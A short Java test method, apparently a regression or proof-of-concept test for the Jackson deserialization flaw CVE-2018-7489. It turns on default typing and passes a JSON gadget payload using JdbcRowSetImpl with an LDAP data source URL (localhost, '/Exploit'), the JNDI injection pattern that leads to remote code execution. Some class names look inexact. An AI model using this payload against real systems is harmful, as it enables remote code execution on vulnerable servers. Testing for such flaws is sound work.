public void testCVE2018_7489() throws Exception {
    c3p0.C3P0ProxyConnection c = (c3p0.C3P0ProxyConnection) new C3P0ProxyConnectionFactory()
            .newInstance(new MockConnection());
    ObjectMapper mapper = new ObjectMapper();
    mapper.enableDefaultTyping();
    mapper.readerForUpdating(c).readValue(
            "[\"com.sun.rowset.JdbcRowSetImpl\", {\"dataSourceName\":\"ldap://127.0.0.1:1389/Exploit\"}]");
}
